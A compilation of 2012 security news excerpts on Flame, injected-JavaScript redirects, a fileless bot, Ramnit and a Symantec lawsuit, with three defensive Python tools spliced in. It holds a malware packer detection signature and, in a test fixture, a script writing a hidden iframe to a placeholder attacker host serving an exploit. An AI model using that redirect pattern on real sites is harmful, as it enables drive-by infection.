    Although we are still analyzing the different modules, Flame appears to be able to record audio via the microphone, if one is present. It stores recorded audio in compressed format, which it does through the use of a public-source library.

    Recorded data is sent to the C&C through a covert SSL channel, on a regular schedule. We are still analyzing this; more information will be available on our website soon.

    The malware has the ability to regularly take screenshots; what's more, it takes screenshots when certain "interesting" applications are run, for instance, IM's. Screenshots are stored in compressed format and are regularly sent to the C&C server - just like the audio recordings.

    We are still analyzing this component and will post more information when it becomes available.

    When was Flame created?

    The creators of Flame deliberately changed the creation dates of the files so that investigators could not establish the true time of creation. The files are dated 1992, 1994, 1995 and so on, but it's clear that these are false dates.

    We consider that the Flame project as a whole was created no earlier than 2010, but it is still under active development. Its creators are constantly introducing changes into different modules, while continuing to use the same architecture and file names. A number of modules were either created or changed in 2011 and 2012.

    According to our own data, we saw Flame in use in August 2010. What's more, based on collateral data, we can be sure that Flame was out in the wild as early as February to March 2010. It's possible that earlier versions existed before then, but we don't have data to confirm this; however, the likelihood is extremely high.
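    A forensic check for the forged compile dates described above, as an added example that is not Kaspersky's code: it reads the COFF TimeDateStamp and linker version from a PE header and flags stamps that fall before an analyst-chosen floor or after the current time. The floor, the minimal PE builder and the sample headers are constructed here for demonstration.

```python
import struct
from datetime import datetime, timezone

# Constructed analyst assumption: the binaries cannot predate the platform
# features they use, so any compile stamp before this floor is treated as
# forged. Tune the floor to the case at hand.
EARLIEST_PLAUSIBLE = datetime(2000, 1, 1, tzinfo=timezone.utc)


def parse_pe_header(data):
    """Read the fields a forger has to touch from a PE image: the COFF
    TimeDateStamp (seconds since the Unix epoch) and the linker version
    recorded in the optional header. Raises ValueError on a non-PE blob."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, stamp, _symtab, _nsyms, opt_size, _chars = \
        struct.unpack_from("<HHIIIHH", data, coff)
    linker = None
    if opt_size >= 4:                       # optional header follows the 20-byte COFF header
        _magic, major, minor = struct.unpack_from("<HBB", data, coff + 20)
        linker = (major, minor)
    return {
        "machine": machine,
        "sections": nsections,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "linker_version": linker,
    }


def assess_timestamp(info, now=None):
    """Classify a parsed header's compile stamp: 'forged-past' if it predates
    EARLIEST_PLAUSIBLE, 'forged-future' if it is later than `now`, otherwise
    'plausible'. Both anomalies are dates chosen to mislead rather than to
    record when the file was really built."""
    now = now or datetime.now(timezone.utc)
    ts = info["timestamp"]
    if ts < EARLIEST_PLAUSIBLE:
        return "forged-past"
    if ts > now:
        return "forged-future"
    return "plausible"


def build_sample_pe(stamp_utc, linker=(9, 0)):
    """Construct a minimal PE header (headers only, no sections) carrying the
    given compile stamp; constructed test input, not a real file."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, int(stamp_utc.timestamp()), 0, 0, 224, 0x2102)
    opt = struct.pack("<HBB", 0x10B, *linker) + b"\0" * (224 - 4)
    return dos + b"PE\0\0" + coff + opt


def sample_header(year):
    """Constructed header stamped 1 June of `year`, for demonstration."""
    return build_sample_pe(datetime(year, 6, 1, tzinfo=timezone.utc))


if __name__ == "__main__":
    for year in (1994, 2011):
        info = parse_pe_header(sample_header(year))
        print(info["timestamp"].date(), info["linker_version"], assess_timestamp(info))
```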

    Why is it called Flame? What is the origin of its name?

    The Flame malware is a large attack toolkit made up of multiple modules. One of the main modules was named Flame - it's the module responsible for attacking and infecting additional machines.

    Is this a nation-state sponsored attack or is it being carried out by another group such as cyber criminals or hacktivists?

    Currently there are three known classes of players who develop malware and spyware: hacktivists, cybercriminals and nation states. Flame is not designed to steal money from bank accounts. It is also different from the rather simple hack tools and malware used by hacktivists. So by excluding cybercriminals and hacktivists, we come to the conclusion that it most likely belongs to the third group. In addition, the geography of the targets (certain states in the Middle East) and also the complexity of the threat leave no doubt about it being a nation state that sponsored the research that went into it.

    Who is responsible?

    There is no information in the code or otherwise that can tie Flame to any specific nation state. So, just like with Stuxnet and Duqu, its authors remain unknown.

    Why are they doing it?

    To systematically collect information on the operations of certain nation states in the Middle East, including Iran, Lebanon, Syria, Israel and so on. Here's a map of the top 7 affected countries:

    Is Flame targeted at specific organizations, with the goal of collecting specific information that could be used for future attacks? What type of data and information are the attackers looking for?

    From the initial analysis, it looks like the creators of Flame are simply looking for any kind of intelligence - e-mails, documents, messages, discussions inside sensitive locations, pretty much everything. We have not seen any specific signs indicating a particular target such as the energy industry - making us believe it's a complete attack toolkit designed for general cyber-espionage purposes.

    Of course, like we have seen in the past, such highly flexible malware can be used to deploy specific attack modules, which can target SCADA devices, ICS, critical infrastructure and so on.

    What industries or organizations is Flame targeting? Are they industrial control facilities/PLC/SCADA? Who are the targets and how many?

    There doesn't seem to be any visible pattern regarding the kind of organizations targeted by Flame. Victims range from individuals to certain state-related organizations or educational institutions. Of course, collecting information on the victims is difficult because of strict personal data collecting policies designed to protect the identity of our users.

    Based on your analysis, is this just one variation of Flame and there are others?

    Based on the intelligence received from the Kaspersky Security Network, we are seeing multiple versions of the malware being in the wild - with different sizes and content. Of course, assuming the malware has been in development for a couple of years, it is expected that many different versions will be seen in the wild.

    Additionally, Flame consists of many different plug-ins – up to 20 – which have different specific roles. A specific infection with Flame might have a set of seven plugins, while another infection might have 15. It all depends on the kind of information that is sought from the victim, and how long the system was infected with Flame.

    Is the main C&C server still active? Is there more than one primary C&C server? What happens when an infected machine contacts the C&C server?

    Several C&C servers exist, scattered around the world. We have counted about a dozen different C&C domains, run on several different servers. There could also be other related domains, which could possibly bring the total to around 80 different domains being used by the malware to contact the C&C. Because of this, it is really difficult to track the deployment and usage of C&C servers.

    Was this made by the Duqu/Stuxnet group? Does it share similar source code or have other things in common?

    In size, Flame is about 20 times larger than Stuxnet, comprising many different attack and cyber-espionage features. Flame has no major similarities with Stuxnet/Duqu.

    For instance, when Duqu was discovered, it was evident to any competent researcher that it was created by the same people who created Stuxnet on the "Tilded" platform.

    Flame appears to be a project that ran in parallel with Stuxnet/Duqu, not using the Tilded platform. There are however some links which could indicate that the creators of Flame had access to technology used in the Stuxnet project - such as use of the "autorun.inf" infection method, together with exploitation of the same print spooler vulnerability used by Stuxnet, indicating that perhaps the authors of Flame had access to the same exploits as Stuxnet's authors.

    On the other hand, we can't exclude that the current variants of Flame were developed after the discovery of Stuxnet. It's possible that the authors of Flame used public information about the distribution methods of Stuxnet and put it to work in Flame.

    In summary, Flame and Stuxnet/Duqu were probably developed by two separate groups. We would position Flame as a project running parallel to Stuxnet and Duqu.

    You say this was active since March 2010. That is close to the time when Stuxnet was discovered. Was this being used in tandem with Stuxnet? It is interesting they both exploit the printer-spooler vulnerability.

    One of the best pieces of advice in any kind of operation is not to put all your eggs in one basket. Knowing that sooner or later Stuxnet and Duqu would be discovered, it would make sense to produce other similar projects - but based on a completely different philosophy. This way, if one of the research projects is discovered, the other one can continue unhindered.

    Hence, we believe Flame to be a parallel project, created as a fallback in case some other project is discovered.

    In your analysis of Duqu you mentioned "cousins" of Duqu, or other forms of malware that could exist. Is this one of them?

    Definitely not. The "cousins" of Duqu were based on the Tilded platform, also used for Stuxnet. Flame does not use the Tilded platform.

    This sounds like an info-stealing tool, similar to Duqu. Do you see this as part of an intelligence-gathering operation to make a bigger cyber-sabotage weapon, similar to Stuxnet?

    The intelligence gathering operation behind Duqu was rather small-scale and focused. We believe there were less than 50 targets worldwide for Duqu - all of them, super-high profile.

    Flame appears to be much, much more widespread than Duqu, with probably thousands of victims worldwide.

    The targets are also of a much wider scope, including academia, private companies, specific individuals and so on.

    According to our observations, the operators of Flame artificially keep the number of infected systems at a roughly constant level. This can be compared with the sequential processing of fields: they infect several dozen machines, then analyze the data from the victims, uninstall Flame from the systems that aren't interesting, and leave the most important ones in place. After that they start a new series of infections.

    What is Wiper and does it have any relation to Flame? How is it destructive and was it located in the same countries?

    The Wiper malware, which was reported on by several media outlets, remains unknown. While Flame was discovered during the investigation of a number of Wiper attacks, there is no information currently that ties Flame to the Wiper attacks. Of course, given the complexity of Flame, a data wiping plugin could easily be deployed at any time; however, we haven't seen any evidence of this so far.

    Additionally, systems which have been affected by the Wiper malware are completely unrecoverable - the extent of damage is so high that absolutely nothing remains that can be used to trace the attack.

    There is information about Wiper incidents only in Iran. Flame was found by us in different countries of the region, not only Iran.

    Functionality/Feature Questions about the Flame Malware

    What are the ways it infects computers? USB Sticks? Was it exploiting vulnerabilities other than the print-spooler to bypass detection? Any 0-Days?

    Flame appears to have two modules designed for infecting USB sticks, called "Autorun Infector" and "Euphoria". We haven't seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it's using two methods:

    1. Autorun Infector: the "Autorun.inf" method from early Stuxnet, using the "shell32.dll" "trick". What's key here is that the specific method was used only in Stuxnet and was not found in any other malware since.
    2. Euphoria: spread on media using a "junction point" directory that contains malware modules and an LNK file that triggers the infection when this directory is opened. Our samples contained the names of the files but did not contain the LNK itself.

    In addition to these, Flame has the ability to replicate through local networks. It does so using the following:

    1. The printer vulnerability MS10-061 exploited by Stuxnet, using a special MOF file executed on the attacked system using WMI.
    2. Remote job tasks.
    3. When Flame is executed by a user who has administrative rights to the domain controller, it is also able to attack other machines in the network: it creates backdoor user accounts with a pre-defined password that is then used to copy itself to these machines.

    [May 31, 2012] Flame anatomy of a super-virus


    [May 31, 2012] Understanding the Flame Malware By Sean Michael Kerner

    May 29, 2012 | eSecurity Planet

    Known by the names Flame, Flamer, and sKyWIper, the malware is significantly more complex than either Stuxnet or Duqu -- and it appears to be targeting the same part of the world, namely the Middle East.

    Preliminary reports from various security researchers indicate that Flame likely is a cyberwarfare weapon designed by a nation-state to conduct highly targeted espionage. Using a modular architecture, the malware is capable of performing a wide variety of malicious functions -- including spying on users' keystrokes, documents, and spoken conversations.

    Vikram Thakur, principal research manager at Symantec Security Response, told eSecurity Planet that his firm was tipped off to the existence of Flamer by Hungarian research group CrySys (Laboratory of Cryptography and System Security). As it turned out, Symantec already had the Flamer malware (known to Symantec as W32.Flamer) in their database as it had been detected using a generic anti-virus signature. "Our telemetry tracked it back at least two years," Thakur said. "We're still digging in to see if similar files existed even prior to 2010."

    Dave Marcus, Director of Security Research for McAfee Labs, told eSecurity Planet that Flamer shows the characteristics of a targeted attack.

    "With targeted attacks like Flamer, they are by nature not prevalent and not spreading out in the field," Marcus said. "It's not spreading like spam, it's very targeted, so we've only seen a handful of detections globally."

    While the bulk of all infections are in the Middle East, Marcus noted that he has seen command-and-control activity in other areas of the world. Generally speaking, malware command and control servers are rarely located in the same geographical region where the malware outbreaks are occurring, Marcus noted.

    The indications that Flamer may have escaped detection for several years are a cause for concern for many security experts.

    "To me, the idea that this might have been around for some years is the most alarming aspect of the whole thing," Roger Thompson, chief emerging threats researcher at ICSA Labs, told eSecurity Planet. "The worst hack is the one you don't know about. In the fullness of time, it may turn out that this is just a honking great banking Trojan, but it's incredibly dangerous to have any malicious code running around in your system, because it's no longer your system -- it's theirs."

    Complex and Scalable Code

    Although it is still early days in the full analysis of Flamer, one thing is clear: the codebase is massive.

    "Flamer is the largest piece of malware that we've ever analyzed," said Symantec's Thakur. "It could take weeks if not months to actually go through the whole thing."

    McAfee's Marcus noted that most of the malware he encounters is in the 1 MB to 3 MB range, whereas Flamer is 30 MB or more.

    "You're literally talking about an order of complexity that is far greater than anything we have run into in a while," Marcus said.

    Flamer has an architecture that implies the original design intent was to ensure modular scalability, noted Thakur: "They used a lot of different types of encryption and coding techniques and they also have a local database built in."

    With its local database, Flamer could potentially store information taken from devices not connected to the Internet.

    "If the worm is able to make it onto a device that is not on the Internet, it can store all the data in the database which can then be transferred to a portable device and then moved off to a command and control server at some point in the future," Thakur said.

    Portions of Flamer are written in the open-source Lua programming language, which Thakur notes is interesting in that Lua is very portable and could potentially run on a mobile phone. Flamer also uses SSH for secure communications with its command-and-control infrastructure.

    Thakur noted that Symantec's research team is trying to trace Flamer back to its origin, but cautioned that it will be a long analytical process. Symantec researchers will dig through all of their databases in an attempt to find any piece of evidence that may be linked to any of the threats exposed by Flamer.

    "It's a very difficult job and it's not an exact science," Thakur said.

    [Apr 19, 2012] Google warns 20,000 websites they could be infected with malware

    April 19, 2012 | Computerworld

    Google has warned 20,000 websites that they might be hacked and injected with JavaScript redirect malware, Google said.

    In a message sent this week, Google said some pages of the website may be hacked. "Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites," the Google Search Quality team said. The team said files are infected with unfamiliar JavaScript and warned that site owners should search in particular for files containing "eval(function(p,a,c,k,e,r)". The code may be placed in HTML, JavaScript or PHP files, Google said.

    Websites were also warned that server configuration files could have been compromised. "As a result of this, your site may be cloaking and showing the malicious content only in certain situations," Google said. It emphasized that it is important to remove the malware and fix the vulnerability to protect site visitors. Webmasters were also urged to keep their software up-to-date and to contact their Web hosts for technical support.
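    A scanner for the search Google asked site owners to perform, as an added example that is not Google's tool: it walks a web root, checks HTML, JavaScript and PHP files for the "eval(function(p,a,c,k,e,r)" marker and reports file and line. It goes slightly beyond the literal string by tolerating inserted whitespace; the sample web root it scans is constructed in a temporary directory.

```python
import os
import re
import tempfile

# Signature Google told site owners to search for. The regex tolerates the
# whitespace variations obfuscators sometimes insert, which a literal string
# search would miss; that is an extension beyond the notice quoted above.
PACKER_MARKER = re.compile(
    r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*r\s*\)"
)
# Google named HTML, JavaScript and PHP files as the places the code may sit.
SCAN_EXTENSIONS = {".html", ".htm", ".js", ".php"}


def scan_file(path):
    """Return (line_number, snippet) for every line of `path` that carries the
    marker. Files are decoded leniently so a stray binary never aborts a scan."""
    hits = []
    with open(path, "rb") as fh:
        for lineno, raw in enumerate(fh, 1):
            line = raw.decode("utf-8", errors="replace")
            m = PACKER_MARKER.search(line)
            if m:
                hits.append((lineno, line[m.start():m.start() + 60].rstrip()))
    return hits


def scan_tree(root):
    """Walk a web root and report [(relative_path, line_number, snippet)] for
    every HTML, JavaScript or PHP file containing the packer marker."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            for lineno, snippet in scan_file(full):
                findings.append((os.path.relpath(full, root), lineno, snippet))
    return sorted(findings)


def make_sample_site():
    """Create a constructed web root in a temp dir: one clean script, one HTML
    page with the marker appended, one PHP file with a spaced-out variant, and
    a .txt file that must be ignored. Returns the root path."""
    root = tempfile.mkdtemp(prefix="sample_site_")
    os.makedirs(os.path.join(root, "js"))
    files = {
        "js/app.js": "function init() { console.log('hello'); }\n",
        "index.html": "<html><body>\n<p>Welcome</p>\n"
                      "<script>eval(function(p,a,c,k,e,r){return p}('x',0,0,[]))</script>\n"
                      "</body></html>\n",
        "contact.php": "<?php echo 'ok'; ?>\n"
                       "<script>eval( function ( p , a , c , k , e , r ) {} )</script>\n",
        "notes.txt": "eval(function(p,a,c,k,e,r) in a text file is not scanned\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, lineno, snippet in scan_tree(make_sample_site()):
        print(f"{path}:{lineno}: {snippet}")
```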

    It is not the first time Google has warned website owners to look for malware infections, Google spokesman Mark Jansen said in an email. "It's part of our ongoing mission to be transparent with webmasters and do our bit to help prevent spam," he said. "In fact this isn't a new phenomenon; we communicate very openly with webmasters and always have done."

    Google's anti-malware campaigns can have a big impact. Last July Google excluded more than 11 million URLs from the "" domain, because they were regularly used by cybercriminals to spread antivirus programs and conduct drive-by attacks. Google explained in a blog post at the time that some bulk providers could host more than 50,000 malware domains, and that it could flag whole bulk domains in severe cases.

    [Apr 14, 2012] antiphishing

    Beware unauthorised installs. See Google for more info
    Frequently asked questions

    1. What is anti-phishing?

    In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications pretending to be from popular web sites, banking sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. The Anti-phishing Domain Advisor will block phishing sites and keep them away from your computer. When a site gets blocked you can decide to proceed anyway.

    2. How can I uninstall?

    From the control panel click "Add or Remove Programs". Search for Anti-phishing Domain Advisor and click "Remove".

    3. How do I determine that ADA is active?

    Visit this address to verify if your Anti-phishing Domain Advisor is active:

    If it is active you will be redirected to Panda Security.

    [Apr 10, 2012] Selling You on Facebook by Jennifer Valentino-DeVries, Shayndi Raice and Courtney Schley

    "Consumers are being pinned like insects to a pinboard, the way we're being studied". From comments: "Unregulated Capitalism at its best. A feeding shark frenzy where myriads of charlatans all vie for a piece of data so they can then sell it at a profit without regard for decency, integrity, or ethics. Greed is good."

    Many popular Facebook apps are obtaining sensitive information about users, and users' friends, so don't be surprised if details about your religious, political and even sexual preferences start popping up in unexpected places.

    .... .... ....

    A Wall Street Journal examination of 100 of the most popular Facebook apps found that some seek the email addresses, current location and sexual preference, among other details, not only of app users but also of their Facebook friends. One Yahoo service powered by Facebook requests access to a person's religious and political leanings as a condition for using it. The popular Skype service for making online phone calls seeks the Facebook photos and birthdays of its users and their friends.

    ... ... ...

    This appetite for personal data reflects a fundamental truth about Facebook and, by extension, the Internet economy as a whole: Facebook provides a free service that users pay for, in effect, by providing details about their lives, friendships, interests and activities. Facebook, in turn, uses that trove of information to attract advertisers, app makers and other business opportunities.

    Up until a few years ago, such vast and easily accessible repositories of personal information were all but nonexistent. Their advent is driving a profound debate over the definition of privacy in an era when most people now carry information-transmitting devices with them all the time.

    Capitalizing on personal data is a lucrative enterprise. Facebook is in the midst of planning for an initial public offering of its stock in May that could value the young company at more than $100 billion on the Nasdaq Stock Market.

    Facebook requires apps to ask permission before accessing a user's personal details. However, a user's friends aren't notified if information about them is used by a friend's app. An examination of the apps' activities also suggests that Facebook occasionally isn't enforcing its own rules on data privacy.

    Among the possible transgressions of Facebook policies that the Journal identified:

    •The app that sought the widest array of personal information of the 100 examined, "MyPad for iPad," has a two-paragraph privacy policy that says it is "adding Privacy settings shortly." Privacy policies that describe how they collect, use and share data are required by Facebook. The app maker couldn't be reached for comment.

    •Dozens of apps allow advertisers that haven't been approved by Facebook within their apps, which enables advertisers including Google to track users of the apps, according to data collected by PrivacyChoice, which offers privacy services. Google said app-makers control which technology they use to deliver online ads.

    ... ... ...

    It is no surprise, of course, that Facebook can gain deep knowledge of people's lives. It is, after all, a social network where users voluntarily share their names, closest friendships, snapshots, sexual preferences ("interested in men," "interested in women"), schools attended and countless other details, including moment-to-moment thoughts in the form of "status updates."

    This kind of information is the coin of the realm in the personal-data economy. The $28 billion online advertising industry is fueled largely by data collected about users' Web behavior that allow advertisers to create customized ads.

    [Mar 19, 2012] A unique 'fileless' bot attacks news site visitors - Securelist

    In early March, we received a report from an independent researcher on mass infections of computers on a corporate network after users had visited a number of well-known Russian online information resources. The symptoms were the same in each case: the computer sent several network requests to third-party resources, after which, in some cases, several encrypted files appeared on the hard drive.

    The infection mechanism used by this malware proved to be very difficult to identify. The websites used to spread the infection are hosted on different platforms and have different architectures. None of our attempts to reproduce the infections were successful. A quick analysis of KSN statistics that might help to identify the connection between compromised resources and the malicious code being distributed did not yield any results, either. However, we did manage to find something that the news sites had in common.

    Infection sources

    For purposes of analysis, we selected two information resources which we knew had been used to distribute the malware: (a major Russian news agency) and (a popular online newspaper). Regularly saving the contents of these resources did not identify any third-party JS scripts occasionally showing up, iframe tags, 302 errors or any other formal attributes indicating that the resources have been compromised. The only thing they had in common was that they both used AdFox advertisement management system codes, through which teaser exchange was arranged.

    We discovered that the malware is loaded via the teasers on

    Here is how the infection was carried out. A JS script for one of the teasers loaded on the site included an iframe that redirected the user to a malicious site in the .EU domain containing a Java exploit.

    Analysis of the exploit's JAR file demonstrated that it exploits a Java vulnerability (CVE-2011-3544). Cybercriminals have been exploiting this vulnerability since November in attacks targeting both MacOS and Windows users. Exploits for this vulnerability are currently among the most effective and are included in popular exploit packs.

    However, the exploit used in this case was unique and had not been included in any exploit packs: the cybercriminals used their own payload in the attack.
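A check of the kind the analysis above implies, written here as an added example rather than anything from Securelist: it scans a saved page snapshot and, unlike plain snapshot diffing, also the bodies of the ad-network scripts the page loads, flagging any iframe or script target whose host is not on an allowlist of first-party and ad-network hosts, including iframes the ad script writes into the DOM at runtime. The allowlisted hosts, the sample page, the teaser script and the .eu placeholder host are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: the news site's own hosts plus its ad-network host.
# These names are assumptions for the example, not the hosts named by Securelist.
ALLOWED_HOSTS = {"news.example", "static.news.example", "ads.adfox.example"}

# Static <iframe>/<script> tags carrying a src attribute.
TAG_RE = re.compile(
    r'<(iframe|script)\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# HTML that a script emits through document.write('...') / document.write("...").
JS_WRITE_RE = re.compile(
    r'document\.write\s*\(\s*(["\'])(.*?)\1\s*\)', re.I | re.S)
# Elements given a src through the DOM API: el.src = '...' or el.setAttribute('src', '...').
JS_SRC_RE = re.compile(
    r'\.src\s*=\s*["\']([^"\']+)["\']'
    r'|setAttribute\s*\(\s*["\']src["\']\s*,\s*["\']([^"\']+)["\']', re.I)


def host_of(url, base_host):
    """Host an src points at; relative URLs resolve to the page's own host."""
    netloc = urlparse(url.strip()).netloc
    return (netloc or base_host).lower().split(":")[0]


def find_untrusted_frames(page_host, page_html, scripts, allowed=ALLOWED_HOSTS):
    """Scan a saved page snapshot and the bodies of the scripts it loads.

    scripts maps each script URL to the body fetched for the snapshot.
    Returns (origin, kind, host) for every iframe/script target whose host is
    not allowlisted, whether the tag sits in the HTML or is written by a script.
    """
    findings = []

    def check(origin, html):
        for tag, src in TAG_RE.findall(html):
            host = host_of(src, page_host)
            if host not in allowed:
                findings.append((origin, tag.lower(), host))

    check("page", page_html)
    for url, body in scripts.items():
        # Markup written at runtime resolves against the page, not the script.
        for _quote, written in JS_WRITE_RE.findall(body):
            check(url, written)
        for direct, via_attr in JS_SRC_RE.findall(body):
            host = host_of(direct or via_attr, page_host)
            if host not in allowed:
                findings.append((url, "dom-src", host))
    return findings


# Constructed snapshot: the page only references first-party and ad-network
# hosts, so a check of the HTML alone (the "regular saving" above) finds nothing.
PAGE_HTML = """<html><body>
<script src="/js/site.js"></script>
<script src="http://ads.adfox.example/teaser.js"></script>
</body></html>"""

# Constructed teaser script modelled on the described chain: the ad code
# itself writes a hidden iframe pointing at a host outside the allowlist.
TEASER_JS = """var t = document.getElementById('teaser');
document.write('<iframe src="http://attacker-placeholder.eu/java/" width="1" height="1"></iframe>');
"""

SCRIPTS = {
    "http://ads.adfox.example/teaser.js": TEASER_JS,
    "/js/site.js": "console.log('site');",
}


def demo():
    """Run the check over the constructed snapshot together with its scripts."""
    return find_untrusted_frames("news.example", PAGE_HTML, SCRIPTS)


if __name__ == "__main__":
    for origin, kind, host in demo():
        print(f"{origin}: {kind} -> {host}")
```

Checking only the stored HTML returns nothing, which is why the snapshot comparison in the write-up came up empty; the finding appears only once the teaser script's body is inspected as well.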

    [Feb 15, 2012] Wired Opinion Cyberwar Is the New Yellowcake Threat Level

    Cybersecurity is a big and booming industry. The U.S. government is expected to spend $10.5 billion a year on information security by 2015, and analysts have estimated the worldwide market to be as much as $140 billion a year. The Defense Department has said it is seeking more than $3.2 billion in cybersecurity funding for 2012. Lockheed Martin, Boeing, L-3 Communications, SAIC, and BAE Systems have all launched cybersecurity divisions in recent years. Other traditional defense contractors, such as Northrop Grumman, Raytheon, and ManTech International, have invested in information security products and services. We should be wary of proving Eisenhower right again in the cyber sphere.

    Before enacting sweeping changes to counter cyber threats, policy makers should clear the air with some simple steps.

    Stop the apocalyptic rhetoric. The alarmist scenarios dominating policy discourse may be good for the cybersecurity-industrial complex, but they aren't doing real security any favors.

    Declassify evidence relating to cyber threats. Overclassification is a widely acknowledged problem, and declassification would allow the public to verify the threats rather than blindly trusting self-interested officials.

    Disentangle the disparate dangers that have been lumped together under the "cybersecurity" label. This must be done to determine who is best suited to address which threats. In cases of cybercrime and cyberespionage, for instance, private network owners may be best suited and have the best incentives to protect their own valuable data, information, and reputations.


    The government keeps trumpeting about how cybersecurity is essential, but they have very, very little to show that their networks are actually secure. And it's not like cybersecurity suddenly became a concern in the last few years.

    Bradley Manning stole stuff from supposedly secure SIPR, they got a virus in their drones at Creech, Anonymous listens in on FBI conference calls, undoubtedly there's foreign espionage...There are countless more examples.

    Gov. really dropped the ball here and if they were serious about security, they would've implemented tighter controls a long time ago. But what do they do to resolve this? I'm sure there'll be tons of arguing about how security should be implemented, which protocols to use, Agency A doesn't like the way Agency B wants to set up its security, etc., etc., and it'll be years before anything of substance is actually done.

    And to think, many of the people who'll be tasked with making these decisions don't really "get" the internet or networks in general (It's a series of tubez! It's like two cans on a digital string, a digitized pony express! I don't use email!), and the impacts of cybersecurity in particular (Our hacker Marines will storm the digital beachhead, keyboards blazing!).


    Your last paragraph touches on the biggest problem. The 'decision makers' in this case are the absolute WORST POSSIBLE choice for addressing cyber security. Their legislation is likely to be misdirected, unintentionally because of their lack of any real knowledge of the subject matter, and intentionally by the lobbyists who will lead them to federally fund their employers who will want large $$$ to solve problems that do not exist. In the middle of it all are the civil liberties of the citizens, which will be trampled because there is money to be made fleecing ignorant congress critters.

    [Feb 15, 2012] 11 tips for social networking safety

    It's better not to use Facebook at all; using it is a stupid idea in any case.
    Microsoft Protect

    Use caution when you click links that you receive in messages from your friends on your social website. Treat links in messages on these sites as you would links in email messages. (For more information, see Approach links in email with caution and Click Fraud: Cybercriminals want you to 'like' it.)

    [Feb 14, 2012] Breaches galore as Cryptome hacked to infect visitors with malware

    A breach that caused to infect visitors with virulent malware was one of at least six attacks reported to hit high-profile sites or services in the past few days. Others affected included Ticketmaster, websites for Mexico and the state of Alabama, Dutch ISP KPN, and the Microsoft store in India.

    Cryptome, a repository of leaked documents and other information concerning free speech, privacy and cryptography, was attacked by hackers who left code on its servers that attempted to infect visitors using Windows PCs with a trojan spawned by the Blackhole Toolkit, the website reported on Sunday.

    Cryptome founder John Young said in an e-mail that he believes the attackers were able to infect his website with a poisoned PHP file by exploiting a weakness in security or server software provided by Network Solutions, which hosts the Cryptome website.

    ... ... ...

    Word of the compromise came as at least five other high-profile sites and services were also reported to have had their security breached. They include government websites for Mexico and the state of Alabama, the Dutch ISP KPN, the UK arm of Ticketmaster, and the Microsoft store in India. Members of the loosely organized hacker collective Anonymous reportedly took credit for a denial-of-service attack that took out the US government's CIA website and then backed away from the claim.

    Worm steals 45,000 Facebook login credentials, infects victims' friends by Jon Brodkin

    January 5, 2012

    A worm previously used to commit financial fraud is now stealing Facebook login credentials, compromising at least 45,000 Facebook accounts with the goals of transmitting malicious links to victims' friends and gaining remote access to corporate networks.

    The security company Seculert has been tracking the progress of Ramnit, a worm first discovered in April 2010, and described by Microsoft as "multi-component malware that infects Windows executable files, Microsoft Office files and HTML files" in order to steal "sensitive information such as saved FTP credentials and browser cookies." Ramnit has previously been used to "bypass two-factor authentication and transaction signing systems, gain remote access to financial institutions, compromise online banking sessions and penetrate several corporate networks," Seculert says.

    Recently, Seculert set up a sinkhole and discovered that 800,000 machines were infected between September and December. Moreover, Seculert found that more than 45,000 Facebook login credentials, mostly in the UK and France, were stolen by a new variant of the worm.

    "We suspect that the attackers behind Ramnit are using the stolen credentials to log-in to victims' Facebook accounts and to transmit malicious links to their friends, thereby magnifying the malware's spread even further," Seculert said. "In addition, cybercriminals are taking advantage of the fact that users tend to use the same password in various web-based services (Facebook, Gmail, Corporate SSL VPN, Outlook Web Access, etc.) to gain remote access to corporate networks."

    Facebook fraud, of course, is nothing new. Facebook itself has acknowledged seeing 600,000 compromised logins each day, although that accounts for just 0.06 percent of the 1 billion daily Facebook logins each day.

    [Jan 12, 2012] Symantec Sued For Running Fake malware-scans


    "James Gross, a resident of Washington State, filed what he intends to be a class action lawsuit against Symantec in a Northern District California court Tuesday, claiming that Symantec defrauds consumers by running fake scans on their machines, with results designed to bully users into upgrading to a paid version of the company's software. 'The scareware does not conduct any actual diagnostic testing on the computer,' the complaint reads. 'Instead, Symantec intentionally designed its scareware to invariably report, in an extremely ominous manner, that harmful errors, privacy risks, and other computer problems exist on the user's PC, regardless of the real condition of the consumer's computer.'

    Symantec denies those claims, but it has a history of using fear mongering tactics to bump up its sales. A notice it showed in 2010 to users whose subscriptions were ending in 2010 warned that 'cyber-criminals are about to clean out your bank account...Protect yourself now, or beg for mercy.'"

    hcs_$reboot (1536101)

    A number of users reported that after installing Symantec anti-viruses their system was slower, could detect false-positives, or worse, hang. So in a way, the "scareware" is not totally wrong, as it warns about a degraded system - which may well be the case after the full product is installed.

    DCTech (2545590)

    There are perfectly good free antivirus programs now, if you want to run one. Most of them are actually better than the non-free antivirus programs. Microsoft Security Essentials is a free antivirus that is many times better than Symantec's and others. On top of that it is lightweight and fast, compared to the bloated crap that Norton is. It works on slower machines too, detects more viruses and doesn't break stuff.

    On 8 June 2011, PC Advisor listed Microsoft Security Essentials 2.0 in its article Five of the Best Free Security Suites, which included Avast! 6 Free Edition, Comodo Antivirus 5.4, AVG Antivirus 2011 and BitDefender Total Security 2012 Beta.

    So choose from those. Personally I don't run any antivirus as I don't download random executables from the internet nor surf to random porn sites or download from torrent sites. Windows is also secure nowadays, and I haven't had a single malware in like 10 years.

    RogueyWon (735973)
